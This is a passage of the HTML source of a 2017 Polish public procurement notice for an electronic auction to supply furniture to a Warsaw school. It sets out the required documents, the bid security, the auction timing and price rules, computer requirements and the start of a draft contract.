OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Zamawiający nie będzie wzywał do złożenia dokumentów w celu potwierdzenia okoliczności, o których mowa w art.25 ust.1 pkt 3 ustawy Prawo zamówień publicznych.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Zamawiający nie będzie wzywał do złożenia dokumentów w celu potwierdzenia okoliczności, o których mowa w art.25 ust.1 pkt 1 ustawy Prawo zamówień publicznych.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Nie dotyczy</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz wniosku o dopuszczenie do udziału w licytacji o treści zgodnej ze wzoremstanowiącym zał. Nr 3 do Ogłoszenia. 2. Inne dokumenty wymagane w postępowaniu: a) Jeżeli wniosek, w tym wszelkie oświadczenia i dokumenty zostały podpisane przezosobę/by działające na podstawie pełnomocnictwa, do wniosku należy dołączyć właściwepełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność z oryginałemprzez notariusza. W przypadku nie dopełnienia powyższego, po wyczerpaniu drogiwynikającej z art.26 ust.3a ustawy Prawo zamówień publicznych, powyższe będzieskutkowało nie dopuszczeniem Wykonawcy do udziału w licytacji elektronicznej. Poprzezanalogię, jeżeli osobą uprawnioną do składania ofert w imieniu Wykonawcy w trakcietrwania licytacji elektronicznej będzie osoba działająca na podstawie pełnomocnictwa, alboinna osoba niż podpisująca wniosek (np. tylko jeden członek zarządu w przypadkuwieloosobowej reprezentacji), należy dołączyć do wniosku albo najpóźniej na dzień przeddniem, w którym ma zostać przeprowadzona licytacja należy złożyć - pełnomocnictwopodpisane przez osobę/osoby uprawnioną/e do reprezentacji Wykonawcy, w formieoryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza, z któregowynikać będzie prawo do składania ofert w trakcie licytacji elektronicznej. W przypadkunie dopełnienia powyższego, tj. w sytuacji gdy najpóźniej na dzień przed dniem, w którymma zostać przeprowadzona licytacja, nie zostanie złożone pełnomocnictwo, o którym mowapowyżej, Wykonawca nie zostanie dopuszczony do udziału w licytacji elektronicznej. b)Pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania wpostępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku gdywykonawcy wspólnie ubiegają się o udzielenie zamówienia (oryginał lub notarialniepoświadczona kopia). W przypadku nie dopełnienia powyższego, po wyczerpaniu drogiwynikającej z art.26 ust.3a ustawy Prawo zamówień publicznych, powyższe będzieskutkowało nie dopuszczeniem Wykonawców do udziału w licytacji elektronicznej. c)Downiosku o dopuszczenie do udziału w licytacji należy załączyć dokument/ypotwierdzający/e, że osoba podpisująca wniosek i inne dokumenty lub oświadczenia lubudzielająca pełnomocnictwa - jest umocowana do reprezentowania Wykonawcy (wodniesieniu do pełnomocnictwa - była upoważniona do reprezentowania Wykonawcy wdacie udzielenia pełnomocnictwa), chyba że umocowanie wynika z dokumentu/ówdostępnego/ych dla Zamawiającego w myśl art.26 ust.6 ustawy Pzp. d) Wprzypadku, gdy Wykonawca polega na zdolnościach innych podmiotów na zasadachokreślonych w art.22a ust.1 ustawy Prawo Zamówień Publicznych - zobowiązany jestudowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacjizamówienia, przedstawiając w tym celu dokument (w szczególności zobowiązanie tychpodmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacjizamówienia). Udowodnienie, o którym mowa powyżej powinno obejmować nie tylkowskazanie faktu udostępnienia określonych Wykonawcy zasobów przez podmiot trzeci, alewinno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia, wskazywać jego rodzaj,czas udzielenia a także inne istotne okoliczności, w tym wynikające ze specyfiki tegozasobu. Z przedłożonego dokumentu musi wynikać w szczególności: - zakres dostępnychWykonawcy zasobów innego podmiotu; - sposób wykorzystania zasobów innego podmiotu,przez Wykonawcę, przy wykonaniu zamówienia; - zakres i okres udziału innego podmiotuprzy wykonywaniu zamówienia; - czy podmiot, na zdolnościach którego Wykonawcapolega w odniesieniu do warunków udziału w postępowaniu dotyczących doświadczenia, zrealizuje dostawy, których wskazane zdolnościdotyczą (czy będzie brał udział w wykonaniu zamówienia). Przykładowy wzórzobowiązania w zakresie określonych warunków udziału w postępowaniu - stanowizałącznik nr 6 do Ogłoszenia. 3.Zasady wspólnego ubiegania się o udzielenie zamówienia przez wykonawców, o którychmowa w art. 23 ustawy Pzp: 1) Wykonawcy, którzy wspólnie ubiegają się o udzieleniezamówienia mogą łącznie spełniać warunki o których mowa w art. 22 ust. 1 pkt 2ustawyPzp. 2) Wykonawcy występujący wspólnie są zobowiązanido ustanowienia Pełnomocnika do reprezentowania ich (tj. konsorcjum) w postępowaniualbo do reprezentowania ich (tj. konsorcjum) w postępowaniu i zawarcia umowy w sprawieprzedmiotowego zamówienia publicznego. Oryginał pełnomocnictwa lub kopiipoświadczonej notarialnie musi być załączony do wniosku i zawierać w szczególnościwskazania: - postępowania o zamówienie publiczne, którego dotyczy; - wszystkichWykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwyz określeniem adresu siedziby; - ustanowionego Pełnomocnika oraz zakresu jegoumocowania. 3) W przypadku złożenia wspólnego wniosku, w formularzu wnioskupełnomocnik zaznacza w czyim imieniu występuje. 4) Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem. 5) Wodniesieniu do warunków określonych w Sekcji III - pkt 1.3) Ogłoszenia wymagania temuszą być spełnione wspólnie przez Wykonawców (nie musi ich spełniać każdy zWykonawców składających ofertę wspólną osobno, zatem oświadczenie o spełnianiuwarunków udziału w postępowaniu o którym mowa w sekcji III - pkt 3) Ogłoszenia,Wykonawcy mogą złożyć wspólnie. 6) Oświadczenia (inne niż opisane w pkt 7), wykazy lubformularze sporządzone na załączonych do SIWZ wzorach, składa i podpisuje w imieniuwszystkich Wykonawców Pełnomocnik lub wszyscy Wykonawcy wpisując w miejscuprzeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkichWykonawców składających ofertę wspólną. 7) Oświadczenie o niepodleganiu wykluczeniu, o którym mowa w Sekcja III- pkt 3) oraz 7) ppkt 4. Ogłoszenia każdy z uczestników oferty wspólnej składaindywidualnie (odrębnie).4. Mając na uwadzebrzmienie art.24 ust.1 pkt 23) ustawy PZP, odnosząc się równocześnie do brzmienia art.26ust.2f ustawy PZP - Zamawiający informuje, iż w sytuacji gdy Wykonawca nie złoży (w formularzu wniosku o dopuszczenie do udziału w licytacji elektronicznej - pkt 6) oświadczenia o braku przynależności do żadnej grupy kapitałowej, bądź nie złoży (we wskazanym powyżej formularzu wniosku) żadnego oświadczenia w niniejszym zakresie, odpowiednio oświadczenie o przynależności do tej samej grupy kapitałowej lub braku przynależności do tej samej grupy kapitałowej Wykonawca przekazuje na wezwanie Zamawiającego, w terminie 3 dni od dnia przekazania przez Zamawiającego zaproszenia do udziału w licytacji elektronicznej, które w swej treści m.in. zawierać będzie wykaz Wykonawców biorących udział w postępowaniu. Wraz z przedstawieniem oświadczenia Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia publicznego.W przypadku nie dopełnienia powyższego, tj. w sytuacji gdy oświadczenie o braku przynależności Wykonawcy do żadnej grupy kapitałowej nie będzie wynikało z formularza wniosku Wykonawcy, bądź w sytuacji gdy Wykonawca nie złoży w formularzu wniosku żadnego oświadczenia w niniejszym zakresie, a w terminie 3 dni od dnia przekazania przez Zamawiającego zaproszenia do udziału w licytacji, nie zostanie przez niniejszego Wykonawcę złożone oświadczenie, o którym mowa powyżej, po wyczerpaniu drogi, o której traktuje art.26 ust.3 ustawy Prawo zamówień publicznych, Wykonawca zostanie wykluczony z postępowania, a zatem równocześnie nie zostanie dopuszczony do udziału w licytacji elektronicznej.5.Wykonawca zagranicznyskłada dokumenty zgodne z zapisami sekcji III pkt 3) oraz 7) Ogłoszenia, ze szczególnymuwzględnieniem, aby dokumenty złożone z wnioskiem potwierdzały, iż wniosek zostałpodpisany przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawcy zaproszeni do udziału w licytacji elektronicznej zobowiązani będą do wniesienia wadium w wysokości 2 000,00 zł (słownie: dwa tysiące złotych 00/100 groszy) najpóźniej w terminie wskazanym przez Zamawiającego - w Zaproszeniu do wzięcia udziału w licytacji elektronicznej. Wykonawcy, którzy nie wniosą wadium na warunkach określonych przez Zamawiającego, nie zostaną dopuszczeni do udziału w licytacji elektronicznej. Wadium nie jest wymagane na etapie składania wniosków o dopuszczenie do udziału w licytacji elektronicznej.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6">http://aukcje.um.warszawa.pl</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7">http://www.kusy.edu.pl</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">1. Wykonawca, pobiera ze wskazanej w ogłoszeniu o przedmiotowej licytacji stronyinternetowej http://www.kusy.edu.pl wzór wniosku wraz z załącznikami. Następnie, wprzypadku zainteresowania udziałem w licytacji elektronicznej, składa wniosek odopuszczenie do udziału w postępowaniu. Złożenie wniosku jednocześnie oznaczaakceptację warunków licytacji i postanowień umowy. Zamawiający, po weryfikacjinadesłanych wniosków, informuje Wykonawców o wyniku kwalifikacji oraz zaprasza doskładania ofert (postąpień) wszystkich Wykonawców spełniających warunki udziału wpostępowaniu. Treść zaproszenia zawierać będzie adres strony internetowej, na którejodbywać się będzie licytacja oraz parametry licytacji elektronicznej (data, godzina otwarcia,czas trwania i warunki zamknięcia licytacji). Następnie za pośrednictwem operatoraplatformy aukcyjnej do zakwalifikowanych do udziału w licytacji Wykonawców (na adrese-mail osoby wskazanej we wniosku o dopuszczenie do udziału w postępowaniu) zostaniewysłana wiadomość wraz z instrukcją obsługi platformy aukcyjnej. Kody dostępu doplatformy aukcyjnej: 1) Operator platformy aukcyjnej przekazuje zakwalifikowanym przezZamawiającego Wykonawcom informację o sposobie rejestracji na platformie aukcyjnej. Wtrakcie rejestracji Wykonawca otrzyma kod dostępu do platformy aukcyjnej. Otrzymanykod dostępu do platformy aukcyjnej Wykonawca będzie musiał zmienić na nowy -określony przez siebie. 2) O ewentualnych problemach z rejestracją należy niezwłoczniepowiadomić osobę upoważnioną do kontaktu z Wykonawcami, której dane kontaktoweprzekazane zostaną w zaproszeniu do składania ofert w licytacji elektrycznej. W dalszejkolejności, w terminie wyznaczonym w treści wiadomości, dla Wykonawców zaproszonychdo udziału w licytacji elektronicznej zostanie zdefiniowana licytacja testowa. W trakcielicytacji testowej, dla zainteresowanych Wykonawców, operator platformy przeprowadzitelefonicznie szkolenie dotyczące zasad korzystania z platformy aukcyjnej, w czasie któregozostaną omówione zasady postępowania w trakcie licytacji elektronicznej. 2. Komputerużytkownika powinien spełniać następujące wymagania: posiadać zainstalowany systemoperacyjny wspierany przez producenta tego systemu (Windows 7/Windows 8/Windows 10bądź nowszy); być wyposażony w procesor taktowany zegarem o częstotliwości 1 GHz iposiadać co najmniej 1 GB pamięci RAM (są to wymagania jakie powinien spełnićkomputer z systemem Windows 7); posiadać zainstalowaną przeglądarkę internetowąwspieraną przez jej producenta: Microsoft Internet Explorer w wersji co najmniej IE10 alboMozilla Firefox; posiadać połączenie z siecią Internet o przepustowości nie mniejszej niż 128 kb/s. 3. Od momentu otwarcia do momentu zamknięcia licytacji, zgodnie z art.77ustawy Pzp, Zamawiający i Wykonawcy przekazują wnioski, oświadczenie i inneinformacje drogą elektroniczną, za pomocą platformy, na której prowadzona jest licytacja.</span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9">1. W trakcie licytacji Wykonawca podaje ryczałtową cenę brutto (z VAT) za zakresokreślony w Opisie przedmiotu zamówienia stanowiącym załącznik nr 1 do Ogłoszenia orazwzorze umowy zawartym w sekcji IV - pkt 4) Ogłoszenia (stanowiącym równocześniezałącznik nr 2 do Ogłoszenia). 2. W toku licytacji elektronicznej Zamawiający na bieżącoprzekazuje wszystkim Wykonawcom informacje o pozycji składanych przez nich ofert,liczbie Wykonawców biorących udział w licytacji, a także o cenach złożonych przez nichofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacjiumożliwiających identyfikację Wykonawców. 3. Zamawiający przewiduje otwarcie licytacjielektronicznej w dniu 18.07.2017 r. o godz.12:00. Ostateczny termin licytacji Zamawiającypoda w zaproszeniu do udziału w licytacji elektronicznej. Zamawiający ustala czas trwanialicytacji na 15 minut. Zamawiający zamyka licytację, gdy w podstawowym czasie niezostanie złożona żadna oferta lub gdy w ciągu 3 minut od złożenia oferty przez jednego zWykonawców nie zostanie złożona żadna inna oferta, jednakże nie wcześniej niż poupływie 15 minut od otwarcia licytacji. Zamawiający zastrzega sobie prawo do zmianpowyższych parametrów licytacji. O zmianach zostaną niezwłocznie poinformowaniewszyscy zaproszeni Wykonawcy. 4. Za ofertę najkorzystniejszą zostanie uznana oferta,która zawierać będzie w chwili zamknięcia licytacji elektronicznej, najniższą ryczałtowącenę brutto za realizację całego zamówienia. 5. Zapłata nastąpi zgodnie z warunkamiumowy - wzór umowy zamieszczony został w pkt IV.4) Ogłoszenia (stanowiącejrównocześnie załącznik nr 2 do Ogłoszenia). 6. Zamawiający dopuszcza prowadzenierozliczeń z Wykonawcą jedynie w walucie polskiej. Dodatkowo nadmienia się, iż składanieofert (postąpień) w licytacji elektronicznej musi być także wyrażone w walucie polskiej.Ryzykiem konieczności wykonania wszelkich prac towarzyszących, mogących pojawić sięw trakcie realizacji zamówienia, ryzykiem związanym ze zmianą stawki podatku VAT,zmianami kursów walut, ceł itp., obciąża się Wykonawcę a Wykonawca winien jeuwzględnić w składanej w trakcie licytacji ofercie (postąpieniu). 7. Minimalna wysokośćpostąpień - 1 000,00 zł 8.Cena wywoławcza: 190 000,00 zł 9. Po zamknięciu licytacji elektronicznej, Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązekprzekazać Zamawiającemu w formie formularza - ceny jednostkowe mebli, który stanowićbędzie załącznik nr 3 do wzoru umowy. Formularz ten jest kalkulacją Wykonawcysporządzoną przez niego w oparciu o opis przedmiotu zamówienia stanowiący załącznik nr1 do Ogłoszenia oraz wzór umowy zamieszczony w sekcji IV - pkt 4) Ogłoszenia(stanowiący załącznik nr 2 do Ogłoszenia), z tym że łączna cena zamówienia brutto musibyć co najwyżej równa z ceną realizacji oferty, która wygrała licytację elektroniczną.Wszystkie ceny muszą być ustalone z dokładnością do dwóch miejsc po przecinku.</span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: 15 minut</span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2017-07-07</span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 10:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">18.07.2017</span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">Zamawiający przewiduje otwarcie licytacji elektronicznej w dniu 18.07.2017 r. godzina12:00. Zamawiający przewiduje zamknięcie licytacji elektronicznej w dniu 18.07.2017 r. ogodzinie 12:15, dodatkowe informacje zawarte zostały w punkcie odnoszącym się dosposobu postępowania w licytacji elektronicznej.</span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">§ 1 Przedmiot umowy. 1. Przedmiotem umowy jest dostawa przez Wykonawcę na rzeczZamawiającego mebli na potrzeby Szkoły prowadzonej przez Zamawiającego, którychwykaz tematyczny, ilościowy i wymagania technologiczno-techniczne stanowi Załącznik nr1 do niniejszej umowy, zwanych dalej ,,meblami", na zasadach określonych w niniejszejumowie. 2. W ramach dostawy Wykonawca zobowiązuje się do transportu mebli dosiedziby Szkoły prowadzonej przez Zamawiającego przy ul. Samuela Bogumiła Lindego 20,01-952 Warszawa, zwanej dalej ,,Szkołą", a następnie do wniesienia i montażu mebli na terenie Szkoły oraz ich ustawienia na piętrach i w pomieszczeniach Szkoły wskazanychprzez Zamawiającego (budynek bez windy). Wykonawca oświadcza, że zapoznał się zwarunkami Szkoły i będzie możliwe wniesienie, montaż oraz ustawienie mebli napowyższych zasadach. 3. Wykonawca zobowiązuje się, że wszystkie dostarczone meblebędą nowe (tzn. wyprodukowane nie wcześniej 